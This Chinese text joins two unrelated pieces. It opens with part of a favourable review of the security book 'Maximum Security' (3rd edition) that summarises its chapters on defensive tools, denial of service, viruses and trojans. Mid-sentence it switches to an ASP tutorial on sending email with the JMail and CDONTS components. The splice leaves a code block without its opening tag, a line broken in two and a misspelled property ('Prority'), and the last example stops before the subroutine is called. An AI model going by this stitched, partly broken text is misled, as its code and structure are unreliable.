第IV部分则介绍了可以用于防止恶意攻击的各种工具、工具集和商用产品,第10章防火墙,第11章安全评估工具(扫描器),第12章入侵检测系统(IDS),第13章日志和监听工具,第14章口令破译,第15章嗅探器(指能捕获网络报文的设备。嗅探器的正当用处是为了分析网络流量并找出可能出现问题的区域。例如网络中某一段工作不正常:数据包的传输速度非常慢或者某台机器通过网络启动时死机了,这时就可以使用嗅探器来判断问题到底出现在什么地方。)
第V部分介绍了目前计算机界最恶毒的三类攻击,对这些会给系统和网络造成破坏的工具进行了深入的剖析。该部分包括第16章拒绝服务攻击,第17章病毒和蠕虫以及第18章特洛伊木马,作者在每章的小结处均会总结出相应的抵御恶意攻击的办法。当然,解决的方法必须是综合考虑的,正如谈到特洛伊木马的防范,书中就提出对于Window和UNIX系统,不仅要检测特洛伊木马,还要检测系统的一致性,从而降低系统受到特洛伊木马攻击的概率。虽然实现起来会有一定的困难,但是通过工作站是可以实现的。一致性管理、从初次安装系统就有效地备份数据、严格的用户管理安装和执行经过认证的软件,只有将这些方法相结合才能更有效地抵御该类攻击。
第VI部分"平台与安全性"转入阐述如何防止特定的计算机和操作系统遭受恶意攻击,包括以下各种平台系统,常用的有Microsoft操作系统、UNIX和Novell NetWare,而一些专用的操作平台,如Cisco IOS、Macintosh和VAX/VMS也在书中得到了充分的涉及,这方面的内容正好能填补读者在知识上的盲点,这也充分地体现了作者对整个安全领域的认识是既有深度又有广度,也是这本书与众不同的又一佐证。例如,书中提到VAX/VMS在这个游戏的年代是废弃的系统,然而并未退出竞争。作者认为,如果打算在Internet安全领域中谋求一个职位,就必须在VMS方面进行一定程度的学习。
第VII部分"综合应用",顾名思义是作者将之前所讲述的所有内容综合起来,形成一种较为复杂的信息安全战略。作者的观点恰恰代表了广大安全工作者的心声"安全是一个过程,不是功能部件,要求扎实的但不是无法完成的工作",对安全的考虑不应该在应用软件、系统或产品开发周期完成后就结束。它是一个持续的过程,应该在应用软件使用期限的整个过程中一直进行。安全性涉及的技术细节要求大量的时间、经验和掌握的暴露程度。安全意识、以及从安全观点分析的能力使得设计人员、开发人员和他们的管理人员能够确定问题并做出响应,这样就有助于创建一个设计良好的、可靠的和安全的应用软件。
这是一本几乎完美的作品,精彩延续到最后的附录部分。从图书信息,到能帮助读者进一步理解安全问题的站点,最后到如何获得具体厂家的安全信息,书中都一一作出了指引。
《最高安全机密》(第3版)这本书中的丰富内容让读者掌握到很多关于安全的理论和方法,作者的奇异经历也使人们得以获取更多宝贵的实战经验,更重要的是,你可以从中体会一名真正黑客的思路。书名中的"最高(Maximum)"一词展示着作者的自信,对于认识到信息安全重要性的读者,这是一部不容错过的顶级著作,相信读过该书的朋友们都会与我同感。在此,我把它推荐给所有关心安全的朋友们阅读
Set jmail = Server.CreateObject("JMAIL.SMTPMail") '创建一个JMAIL对象
jmail.silent = true 'JMAIL不会抛出例外错误,返回的值为FALSE跟TRUE
jmail.logging = true '启用使用日志
jmail.Charset = "GB2312" '邮件文字的代码为简体中文
jmail.ContentType = "text/html" '邮件的格式为HTML的
jmail.ServerAddress = "Server Address" '发送邮件的服务器
jmail.AddRecipient Email '邮件的收件人
jmail.SenderName = "SenderName" '邮件发送者的姓名
jmail.Sender = "Email Address" '邮件发送者的邮件地址
jmail.Priority = 1 '邮件的紧急程序,1 为最快,5 为最慢, 3 为默认值
jmail.Subject = "Mail Subject" '邮件的标题
jmail.Body = "Mail Body" '邮件的内容
jmail.AddRecipientBCC Email '密件收件人的地址
jmail.AddRecipientCC Email '邮件抄送者的地址
jmail.Execute() '执行邮件发送
jmail.Close '关闭邮件对象
%>
w3 Jmail4.3组件重新设计了其内部结构——使用Message对象代替原来的单一对象Jmail.smtpmail发送邮件,有些方法需要身份验证的(如163、yahoo等),可以用下面的方法解决:
<%
Set jmail = Server.CreateObject("JMAIL.Message") '建立发送邮件的对象
jmail.silent = true '屏蔽例外错误,返回FALSE跟TRUE两值j
mail.logging = true '启用邮件日志
jmail.Charset = "GB2312" '邮件的文字编码为国标
jmail.ContentType = "text/html" '邮件的格式为HTML格式
jmail.AddRecipient Email '邮件收件人的地址
jmail.From = "Email From for Sender" '发件人的E-MAIL地址
jmail.MailServerUserName = "UserName of Email" '登录邮件服务器所需的用户名
jmail.MailServerPassword = "Password of Email" '登录邮件服务器所需的密码
jmail.Subject = "Mail Subject" '邮件的标题
jmail.Body = "Mail Body" '邮件的内容
jmail.Prority = 1 '邮件的紧急程序,1 为最快,5 为最慢, 3 为默认值
jmail.Send("Server Address") '执行邮件发送(通过邮件服务器地址)
jmail.Close() '关闭对象
%>
再讲一下微软自带的CDONTS组件的发信的方法:
<%
Set cdomail = Server.CreateObject("CDONTS.NewMail") '建立邮件对象
cdomail.Subject = "Mail Subject" '邮件标题
cdomail.From = "Sender's Mail" '发件人的地址
cdomail.To = "Email will from" '收件人的地址
cdomail.Body = "Mail Body" '邮件的内容
cdomail.Send '执行发送
%>
这种方法发送邮件是最简单的,同时也带来一定的问题,就是很少有服务器会开这项服务!
我们写程序,一般情况下都是说要代码模块化,这样方便维护,同时也方便移植。因此,我在这里将这个发邮件的写成一个子程,在调用的时候可以直接调用(当然,如果你高兴写成函数的话也是可以的,这个主要是看个人兴趣):
<%
'参数说明
'Subject : 邮件标题
'MailAddress : 发件服务器的地址,如smtp.163.com
'Email : 收件人邮件地址
'Sender : 发件人姓名
'Content : 邮件内容
'Fromer : 发件人的邮件地址
Sub SendAction(subject, mailaddress, email, sender, content, fromer)
Set jmail = Server.CreateObject("JMAIL.SMTPMail") '创建一个JMAIL对象
jmail.silent = true 'JMAIL不会抛出例外错误,返回的值为FALSE跟TRUE
jmail.logging = true '启用使用日志
jmail.Charset = "GB2312" '邮件文字的代码为简体中文
jmail.ContentType = "text/html" '邮件的格式为HTML的
jmail.ServerAddress = mailaddress '发送邮件的服务器
jmail.AddRecipient Email '邮件的收件人
jmail.SenderName = sender '邮件发送者的姓名
jmail.Sender = fromer '邮件发送者的邮件地址
jmail.Priority = 1 '邮件的紧急程序,1 为最快,5 为最慢, 3 为默认值
jmail.Subject = subject '邮件的标题
jmail.Body = content '邮件的内容
'由于没有用到密抄跟抄送,这里屏蔽掉这两句,如果您有需要的话,可以在这里恢复
'jmail.AddRecipientBCC Email '密件收件人的地址
'jmail.AddRecipientCC Email '邮件抄送者的地址
jmail.Execute() '执行邮件发送
jmail.Close '关闭邮件对象
End Sub
'调用此Sub的例子
Dim strSubject,strEmail,strMailAdress,strSender,strContent,strFromer
strSubject = "这是一封用JMAIL发送的测试邮件"
strContent = "JMail组件发送测试成功!"
strEmail = "FAQ@xxby.com"
strFromer = "FAQ@xxby.com"
strMailAddress = "mail.xxby.com"